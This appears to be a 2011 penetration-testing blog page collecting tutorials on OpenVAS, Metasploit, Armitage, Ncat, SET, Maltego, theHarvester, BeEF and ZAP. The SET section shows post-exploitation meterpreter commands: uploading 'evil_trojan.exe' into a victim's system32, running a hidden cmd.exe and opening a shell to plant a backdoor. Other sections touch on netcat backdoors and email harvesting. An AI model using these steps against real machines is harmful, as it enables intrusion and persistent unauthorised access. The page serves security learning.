How to Use OpenVAS in Metasploit- OpenVAS & Metasploit Integration

Metasploit includes an OpenVAS module, which allow you to interact with an OpenVAS server to create targets, run scans, download reports, and import reports. Recently I had the opportunity to make some updates to the module and wanted to write a blog post to document how to use it. This blog post does not cover how to setup an OpenVAS server but you can find that info here and here. 

To use the OpenVAS integration you need to load the openvas module within msfconsole. Do this by running the command load openvas. The updates to the openvas module were accepted in revision 13851, so you may need to use msfupdate to get the updated modules.
After the module is loaded, the work flow is very basic. Start by connecting to the server using the command openvas_connect. If you connect to a host other than localhost or 127.0.0.1, then you will need to pass an additional paramater of “ok” to the command. If you forget the “ok” parameter you will be warned that there is no SSL support and your interaction with the server is not secure. Also, you need to use the port for the OpenVAS manager server, openvasmd, which defaults to 9390.

msf > openvas_connect sbh sbh 127.0.0.1 9390
[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username sbh...
[+] OpenVAS connection successful

Next, create a target to scan using the command openvas_target_create. If you want spaces in the name or comment then make sure you place quotations around them.

msf > openvas_target_create "Local Machine" 192.168.70.128 "My Local Machine"
[*] OK, resource created: db1175ac-b40b-4b13-9a80-24b68c2c6b40
[+] OpenVAS list of targets

ID  Name           Hosts           Max Hosts  In Use  Comment
--  ----           -----           ---------  ------  -------
0   Localhost      localhost       1          1
1   Local Machine  192.168.70.128  1          0       My Local Machine

Next, create a task by specifying a target and a configuration. Use the command openvas_config_list to get a list of configurations and the command openvas_target_list to get a list of targets.

msf > openvas_config_list
[+] OpenVAS list of configs

ID  Name
--  ----
0   Full and fast
1   Full and fast ultimate
2   Full and very deep
3   Full and very deep ultimate
4   empty

msf > openvas_task_create "Local Scan" "Scan My Local Machine" 0 1
[*] OK, resource created: 483c6f03-6490-4de2-bd81-c1c5b217d950
[+] OpenVAS list of tasks

ID  Name        Comment                Status  Progress
--  ----        -------                ------  --------
0   Local Scan  Scan My Local Machine  New     -1

Next, start the task with openvas_task_start and watch the progress using openvas_task_list.

msf > openvas_task_start 0
[*] OK, request submitted
msf > openvas_task_list
[+] OpenVAS list of tasks

ID  Name        Comment                Status   Progress
--  ----        -------                ------   --------
0   Local Scan  Scan My Local Machine  Running  2

msf > openvas_task_list
[+] OpenVAS list of tasks

ID  Name        Comment                Status   Progress
--  ----        -------                ------   --------
0   Local Scan  Scan My Local Machine  Running  98

msf > openvas_task_list
[+] OpenVAS list of tasks

ID  Name        Comment                Status  Progress
--  ----        -------                ------  --------
0   Local Scan  Scan My Local Machine  Done    -1

Once the scan is finished, the progress is -1, list the available reports using openvas_report_list.

msf > openvas_report_list
[+] OpenVAS list of reports

ID  Task Name     Start Time                Stop Time
--  ---------     ----------                ---------
0   Example task  Tue Aug 25 21:48:25 2009  Tue Aug 25 21:52:16 2009
1   testtask      Fri Sep 16 14:21:31 2011  Fri Sep 16 14:23:09 2011
2   Local Scan    Fri Oct  7 22:52:46 2011  Fri Oct  7 23:04:48 2011

Next, you can download (openvas_report_dowload) or import (openvas_report_import) the report. You must specify the report format with either command. You can get a list of formats using openvas_format_list. When importing a report you must use the NBE format. Also note, that when trying to download an ITG or PDF report my OpenVAS server returns an empty report, YMMV.

msf > openvas_format_list
[+] OpenVAS list of report formats

ID  Name   Extension  Summary
--  ----   ---------  -------
0   CPE    csv        Common Product Enumeration CSV table.
1   HTML   html       Single page HTML report.
2   ITG    csv        German "IT-Grundschutz-Kataloge" report.
3   LaTeX  tex        LaTeX source file.
4   NBE    nbe        Legacy OpenVAS report.
5   PDF    pdf        Portable Document Format report.
6   TXT    txt        Plain text report.
7   XML    xml        Raw XML report.

msf > openvas_report_download 2 1 /root/ov/reports
[*] Saving report to /root/ov/reports/report-d76434b0-38e6-462c-87e1-717622056e86.html

msf > openvas_report_import 2 4
[*] Importing report to database.

You can see all the available commands using the command openvas_help. If you have any questions or find any bugs in the openvas module let me know at averagesecurityguy [at] gmail [dot] com so I can fix them. If you want to look at the code, it is in /opt/framework/msf3/plugins/openvas.rb and /opt/framework/msf3/lib/openvas/openvas-omp.rb. Enjoy.

About the Author
Stephen has over ten years experience in the information technology field working as a programmer, technical trainer, network operations manager, and information security consultant. He holds a Bachelor of Science in Math and a number of industry certifications, including the Certified Information Systems Security Professional(CISSP), Offensive Security Certified Professional(OSCP), and GIAC Penetration Tester(GPEN).

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ jeudi 17 novembre 2011 0 commentaires

Maltego Tutorial - Mesh Analysis

Maltego is the famous and the best tool that would really helpful in the process of penetration testing and ethical hacking, Maltego is powerful tool that help to gather information from various resources and by using various methods. Information gathering or foot-printing is the first step of hacking so the tools that would help you in this process are generally the important tools. We have discussed maltego before on backtrack 5 and other ways. So in this article we will discuss about Maltego Mesh attack.

Maltego Information Gathering Backtrack 5

Maltego- Information Gathering Tool Tutorial

FootPrinting-Information Gathering Tutorial

FootPrinting-First Step Of Ethical Hacking

Dnsmap- DNS Network Mapper

Backtrack 5- DNSenum Information Gathering Tool

Maltego Mesh is a firefox plugin that helps analysts in quickly find usefull information within a page, essentially it views the page you are looking at and tries to identify text within it that fits preset regular expressions. 

Usage 

To activate Maltego Mesh, either click View->Sidebar->Maltego Mesh or press Ctrl + Shift + M

Once an entity has been found on a page it will be within the sidebar on the right hand side of the browse.

Maltego Mesh Tutorial 

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ jeudi 10 novembre 2011 0 commentaires

Ncat- Netcat Windows and Linux Tutorial

Netcat is one of the best and important tool that plays an important role in the field of IT security, Penetration testing or ethical hacking, it is also called Swiss-army knife for TCP/IP. Here TCP/IP does not show that netcat works for TCP only, it can be use for UPD also. The importance of Netcat is not a hidden truth you can use Ncat for many purposes.

If you are using some Linux distribution like Backtrack, Gnacktrack, Backbox or others than you can find Netcat on this, open terminal and type Netcat if it will response than you don't need to install it.

In this article I will cover some basic and advance usage of Netcat but before going to actual tutorial I want to explain some background.

What Is Netcat ?

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. Unix has a CAT command and netcat has been designed to achieve the goal of Cat command you can use netcat on various operating system, Nmap team has been designed Ncat on the concept of Netcat, so it is primely the same thing.

What Netcat Can Do?

This is the most important and simplest question you might be wonder about it, the answer is that netcat can do various things but here is the most important stuffs.

• Banner grabbing
• File transferring
• Telnet usage
• Shell backdoor

Download

Tutorial

You can use ncat on your Windows box too but for this tutorial I am using backtrack 5 Linux, so here is the tutorial from basic to advance. The basic command is as follows

# ncat

The default port for Netcat is 31337, you can use some other ports as well to connect to the server, remember this a ncat tutorial so in the command I will type ncat instead of netcat. You can find help by using this command.

# ncat -h

If you want to learn banner (the process called banner grabbing) of a server software than use the simplest command of ncat.

# ncat google.com 80

You might wonder that why I have used port number 80, port 80 is for HTTP and sometimes a large server uses firewalls or IDS so the other port might be closed. 

 

So by banner grabbing you can get valuable information.

You can upload any file to any server or client computer here is the main command replace the IP address to your desired IP.

# ncat -l 127.0.0.1 80 < test.txt

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ jeudi 1 septembre 2011 0 commentaires

Grendel Scan Web Application Security Scanner

Web application security scanners are very important in the process of penetration testing, if you want to test your web application from the known and most dangerous vulnerabilities like SQL injection and cross site scripting than you must use some automatic tools that crawls the website and check for the vulnerabilities that can be exploit. 

There are a lot of web security scanner available both commercial and open source and as discussed before about the wapiti, nikto and w3af. The commercial tools like Netsparker and acunetix.

Linux distribution that has created for penetration testing like backtrack, gnacktrack, backbox and blackbuntu has different tools for website penetration testing, in this article I will discuss about a open source web application security scanner called Grendel-Scan that has release on the Defcon event.

What Is Grendel-Scan

Grendel-Scan is an open-source web application security testing tool. It has automated testing module for detecting common web application vulnerabilities, and features geared at aiding manual penetration tests. The only system requirement is Java 5; Windows, Linux and Macintosh builds are available.

Backtrack 5 has contain different web application security scanner as well as it contain Grendel-Scan too, in the tutorial I will use backtrack 5 however you can use and install it on other Linux distribution and windows operating system.

Download

It requires Java to run it, if you are using backtrack 5 than you can get gredenl from Applications-->backtrack-->Vulnerability assessment-->web application assessment-->web vulnerability scanner-->grendel-scan

Grendel-Scan Tutorial

It is not a difficult tool to use, and it has graphical user interface so you can easily understand and implement it on your web security testing process. Here is the short description on the basic usage. 

Enter the target website and if you want to use proxy server than you can enter it.

You can choose variety of options and you can integrate nikto with grendel scan.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Related articles

• Web application security on a new level (net-security.org)
• Penetration Testing in the Cloud (blogs.cisco.com)
• UPDATE: Blackbuntu CE v0.3! (pentestit.com)
• Oracle Buys Ksplice for Linux 'zero Downtime' Tech (pcworld.com)

Read more

by Malik korrich ~ mardi 16 août 2011 0 commentaires

Social Engineering toolkit Tutorial-Backtrack 5

Social engineering also known as human hack, social engineering is an act to manipulate human mind to get the desire goals. Social engineering is a general term and on daily life everyone implement it but usage of social engineering in hacking and penetration testing is little different. The main use of social engineering in hacking is to get the information, maintaining access and so on.

There are various social engineering tips and tricks available on the Internet beside these tips there is a social engineering toolkit available for implement computer based social engineering attack.

What Is Social Engineering Toolkit

In this article I will discuss about the usage of social engineering toolkit on backtrack 5 to hack a windows operating system, but before going to the actual tutorial I want to share the basic introduction of social engineering toolkit that would really help for the beginner.

The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.

Download

If you are using some other Linux distribution than use the command to get SET.

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

Social Engineering Toolkit Tutorial

Well for this tutorial I am using backtrack 5 and the tutorial will teach you a single method to own a computer by using SET toolkit while more SET tutorial will be post on later articles. For the best result I have made video tutorial so,

As I have said on the video that more command on the article so here is the necessary commands.

ps
The 'ps' command displays a list of running processes on the target.

meterpreter > ps

Download

meterpreter > download c:\\boot.ini

Upload

meterpreter > upload evil_trojan.exe c:\\windows\\system32

Execute

meterpreter > execute -f cmd.exe -i -H

shell

If you want to get the DOS screen of victim PC for downloading and upload your backdoor and other jobs use shell.

meterpreter > shell

Process 39640 created.

Channel 2 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Enjoy the article than drop your comments.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Other Readings

• #DefCon 19 : Android Network Toolkit for Penetration Testing and Hacking (thehackernews.com)
• UPDATE: The Social-Engineer Toolkit v2.1! (pentestit.com)
• Penetration Tester's Open Source Toolkit (net-security.org)

Read more

by Malik korrich ~ samedi 13 août 2011 0 commentaires

Theharvester Backtrack 5- Information Gathering Tutorial

Information is a weapon, a successful penetration testing and a hacking process need a lots of relevant information that is why, information gathering so called foot printing is the first step of hacking. An intelligent penetration tester use some intelligent tools and techniques to get the right information on a right time, for social engineering (human hacking) you need relevant information about a person. So the point of this little discussion is to realize the importance of information gathering.

What Is TheHarvester

After getting some knowledge about information gathering you might be interested to know how to perform it. TheHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key servers. This tools has designed to help the penetration tester on a earlier stage, it is an effective and simple tool that is very easy to use.

Supported Sources for Information Gathering

• Google - emails,subdomains/hostnames
• Google profiles - Employee names
• Bing search - emails, subdomains/hostnames,virtual hosts
• Pgp servers - emails, subdomains/hostnames
• Linkedin - Employee names
• Exalead - emails,subdomain/hostnames
  

Related Information Gathering Tutorials

Foot-printing or information gathering is not a new term and we have discussed so many articles with different tools and techniques before for both Windows and Linux (Ubuntu, Backtrack), here is the comprehensive list of articles.

FootPrinting-First Step Of Ethical Hacking

Maltego- Information Gathering Tool Tutorial

Dnsmap- DNS Network Mapper

Backtrack 5- DNSenum Information Gathering Tool

Download Theharvester

If you are using backtrack 5 and other versions of backtrack than you not need to download and run harvester because it is available on backtrack, while for other Linux distributions like ubuntu download and install it. However you can use Theharvester for other Operating system because it need python to run.If you are using Blackbuntu than theharvester available on it.

TheHarvester Tutorial

Theharvester is a very easy tool to use just follow the tutorial to get the best result. For backtrack open terminal and locate the directory.

root@bt:/pentest/enumeration/theharvester#

For other distributions locate the directory. For best result I use the command

root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d google.com -l 500 -b google

root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d targetsite.com -l 500 -b google

So here is the result with complete details.

I hope you are enjoying the reading, now use the wonderful tool by yourself and if you have any question ask via comment box.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Related articles

• Book Reveals, Prevents, The Art of Human Hacking (prweb.com)
• BackBox - Linux distribution based website Hacked (thehackernews.com)
• UPDATE: The Social-Engineer Toolkit v2.1! (pentestit.com)

Read more

by Malik korrich ~ vendredi 12 août 2011 0 commentaires

Tips to Improve Linux Backtrack 5 Performance

If you are using backtrack 5 and having some problems like sound problem, social media software problem, software manager problem and so many more. Some of the blog readers has send a request about these things, if you have used Ubuntu than you must have an idea about tweaks and software manager in Ubuntu. How easy and user friendly Ubuntu is, for backtrack5 you can also do all these stuffs because it is based on Ubuntu.

For this tutorial I am using backtrack5 GNOME based, so below are the some tips to make your bt5 as a desktop operating system that contain all the necessary tools and software's.

Movie/Video player for Gnome

There are different programs are available for GNOME based distribution among them totem media player for Linux is the best open terminal and type.

sudo apt-get install totem-gstreamer

Beside totem media player you can install VLC player for Linux, or you can install VLC for windows on bt5 by using wine.

Team viewer

Team viewer is the best software for desktop sharing and its available for windows and Linux, go to the official website and download a copy than open the terminal and locate the directory than type.

sudo dpkg -i teamviewer_linux.deb

Zip & Unzip for Linux

If you want to run zip files and having some problem with it than you must install zip and unzip for Linux, open the terminal and type

sudo apt-get install zip

Empathy Chat Client for Linux

You are a social kind of person and want to connect with people via chat than you must install empathy because it provides best chat platform on the single place, open terminal and type

sudo apt-get install empathy

PDF Reader for Linux

You can install adobe reader in Linux but there is another software available to read the pdf file and its Foxit reader, download it from official website and on the terminal locate the directory than type

sudo dpkg -i FoxitReader_1.1.0_i386.deb

Office for Linux

Openoffice is the best solution for office users on open source platform get it by using the command

sudo apt-get install openoffice.org

Software Manager for Linux

Software manager is the right place to search and get the right open source software if your Linux does not have software manager than you must install kate for it on the terminal.

apt-get install kate

Firewall for Linux

Have you ever checked your ports by using nmap? if no than you are in dark, open ports are the weakest point of the system security you must close your ports for closing the ports in Linux use Firewall, Firestarter firewall is the best get it via 

sudo apt-get install firestarter

Gwibber Social Media Client

Social media including twitter, facebook and more are now become more power full and successful so if you want use all these social networking website in a single place than get gwibber.

sudo apt-get install gwibber

FTP Client for Linux

FTP (File transfer protocol) is an important protocol for transferring the large files, if you want to connect to any server via FTP than you must have gFTP like client get it.

sudo apt-get install gftp 

If you are experiencing sound and voice problem is backtrack 5 (ubuntu) Linux than you must care about codec and other restrictions of Ubuntu.

sudo apt-get install ubuntu-restricted-extras

sudo apt-get install w32codecs

sudo apt-get install w32codecs libdvdcss2

How to Update & Upgrade Linux

It is a better policy to update all the software's and packages on frequently to avoid any kind of exploitation, well for complete Linux up-gradation use  

sudo apt-get upgrade

While for updating all the software's and packages use 

sudo apt-get update 

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ vendredi 5 août 2011 0 commentaires

Maltego Information Gathering Backtrack 5

Information gathering or foot-printing is generally a first step of Ethical hacking/penetration testing process. The more information you have the more chance of success, information gathering is the important phase because all of the process of hacking based on information that you have. Backtrack and specially Backtrack 5 contain a list of tools that will help you to gather information as DNSenum for DNS information gathering.

Maltego is an intelligent application that will help you to gather maximum information about people about networks and more, it has a broad features to discuss but the main aim of writing this article is not to discuss the feature of maltego but the aim is to demonstrate maltego on the platform of backtrack5. 

Maltego tutorial has been discussed before on ubuntu with videos click here to learn.

• For bt5, go to Applications-->Backtrack-->Information Gathering-->Network Analysis-->DNS Analysis-->Maltego
• The first windows will ask you to register your product. 

• After registration you will able to use maltego, if you will not register your product than you will not able to use it.
• On the top there is a two tabs, Investigate and Manage
• Go on manage tab than open a new page

• There are a lot of different entities available on the screen but the main option is Palette option that is available on left side, if you will not register the product than you would not recognize it.
• Now at this point everything is same as discussed on the previous maltego tutorial, follow the tutorial to run and use it.

FootPrinting-Information Gathering Tutorial

FootPrinting-First Step Of Ethical Hacking

Dnsmap- DNS Network Mapper

Backtrack 5- DNSenum Information Gathering Tool

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ mardi 26 juillet 2011 0 commentaires

BeEF- Browser Exploitation Framework

Technology has no end and has no boundary, we have discussed different web and network vulnerability scanning tools and techniques to exploit something, beside vulnerability scanning tools there are different way and tools available for exploiting, you might hear about server side exploit but what if someone exploitation your browser, yes you must care about your browser too.
 
Below is the small study on browser exploitation, that would really help you to increase your knowledge and skills.


In general browser exploitation means to take advantage of vulnerability in the software (may be OS) to change and alter browser setting without the knowledge of the user. There are different techniques and tools available but this time we will talk about BeEF, the best browser exploitation framework.


BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors. BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target, BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. The framework allows the penetration tester to select specific modules (in real-time) to target each browser. 

Download

Tutorial

Well you can get so many tutorial from the official website of BeEF, click here to learn.
BeEF is also available of backtrack so if have an expertise of backtrack platform you might know about it. 


Well here is video tutorial of BeEF, this tutorial is by  Jabra with many thanks we would like to share it here.

 

Note: If you enjoyed this post, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ mardi 7 juin 2011 0 commentaires

OWASP Zed Attack Proxy- ZAP

OWASP or Open Web Application Security Project is a non profit organisation world wide that are focusing on improving the security of web application, for more about OWASP click here. There are different automatic tools available for testing the security of a web application, and there are different tools for proxy based attack but this time we will discuss about ZAP or Zed Attack Proxy.


The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has an automatic scanning functionality and it has a set of tools that allow you to find vulnerability manually.

ZAP provides a basic port scanner which shows which ports are open on the target sites.ZAP is an Intercepting Proxy. It allows you to see all of the requests you make to a web application and all of the responses you receive from it. Amongst other things this allows you to see AJAX calls that may not otherwise be obvious.

ZAP passively scans all of the responses from the web application being tested. Passive scanning does not change the responses in any way and is therefore safe to use.

Download

Tutorial

You need Java to run the application, after downloading and installation set your browser to the localhost proxy and than open terminal and locate the directory where ZAP has been installed before, now on the terminal type.

$ java -jar zap.jar

The overall process is same as Paros Proxy, because ZAP is a fork of paros proxy.

Note: If you enjoyed this post, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ dimanche 5 juin 2011 0 commentaires

Armitage - Cyber Attack Management

Technology has no end, on the previous article we have discussed about metasploit framework, that has been changed the way of penetration testing, Armitage is a graphical cyber attack management tool for Metasploit that visualises your targets, recommends exploits, and exposes the advanced capabilities of the framework.




When metasploit and armitage meet to each other than they make a powerful cyber management tool for doing pen testing on the network(s). Armitage allow your team to use the same sessions, share data, and communicate through one Metasploit instance. It is very helpful tool to learn about the cyber security because it provides a graphical interface instead of command line.

Just like metasploit, Armitage is also available for different operating system like Linux, Windows and MAC. Below is the tutorial on how to get and install armitage.

Tutorial

Requirement: 

• Java 1.6.0+
• Metasploit 3.5+

Install Armitage On Linux 

You can get install armitage by a simple command but before execute this application get command you need to be a root user to install armitage so open terminal and type exactly,

$ sudo su

# apt-get install armitage

We need to enable RPC daemon for metasploit use this command on the terminal,

root@bt:~# msfrpcd -f -U msf -P test -t Basic

Now start MYSQL server so that Armitage stores results 

root@bt:~# /etc/init.d/mysql start

Now its time to run Armitage, locate the directory and type 

root@bt:/pentest/exploits/armitage# ./armitage.sh

After this a new window must be appear, setup the default host name if you want to use SSL than tick on it,

Note: If you enjoyed this post, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ lundi 30 mai 2011 0 commentaires

Metasploit- An Introduction

If you are active in the community of Penetration tester/ethical hacker than you have heard about metasploit, because it is the most famous tool and used by the most penetration tester as well as used by the hackers. Metasploit is an open source security (Computer) project that contain the information about vulnerabilities.

If you just put all the available exploit in a single place than the phenomena of metasploit occur.

Metasploit framework is a sub project and is use to execute exploit code against a machine and get the desire task done.

Before discussing how to do all the things, you need to understand some basic terms like, vulnerability, exploit and payload. Vulnerability is a weakness or a hole by which an attacker can compromise a machine. Exploit may be a piece of code is an attack that takes advantage of a vulnerability. A payload is the piece of software that lets you control a computer system after it’s been exploited.

Metasploit project provides metasploit pro, metasploit express and metasploit framework. Metasploit framework is an open source and available for free for cross operating system platform (Windows, Linux).

How To Install Metaspolit 
 

In this tutorial we will discuss how to get and install metasploit framework for both Windows and for Linux (like ubuntu), if you are using backtrack than you can find metasploit over there.  

Install Metasploit on ubuntu:

We need some packages to install metasploit, open terminal and type exactly.

$ sudo apt-get install ruby libruby rdoc

$ sudo apt-get install libyaml-ruby

$ sudo apt-get install libzlib-ruby

$ sudo apt-get install libopenssl-ruby

$ sudo apt-get install libdl-ruby

$ sudo apt-get install libreadline-ruby

$ sudo apt-get install libiconv-ruby

$ sudo apt-get install rubygems

Click here to download metasploit, in this case we have downloaded Linux-full.run file. You need to become a root user to run this installation on the terminal type.

$ sudo su

Now locate the directory where you have downloaded metasploit before and type.

$ ./name_of_file.run

Now just forward it accept the agreement, after installation, to run metasploit on the terminal type.

$ msfconsole

Install Metasploit on Windows:

If you want to install metasploit on windows than you need to download the executable file of metasploit click here to download:  The installer includes the packages 

• Console2
• Ruby 1.9.2
• PostgreSQL
• Java JDK 6
• Subversion
• VNCViewer
• WinVI32
• Nmap 5.6

So you dont need to download any other file, just run the installer and you are done!

 

Note: If you enjoyed this post, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.

Read more

by Malik korrich ~ dimanche 29 mai 2011 0 commentaires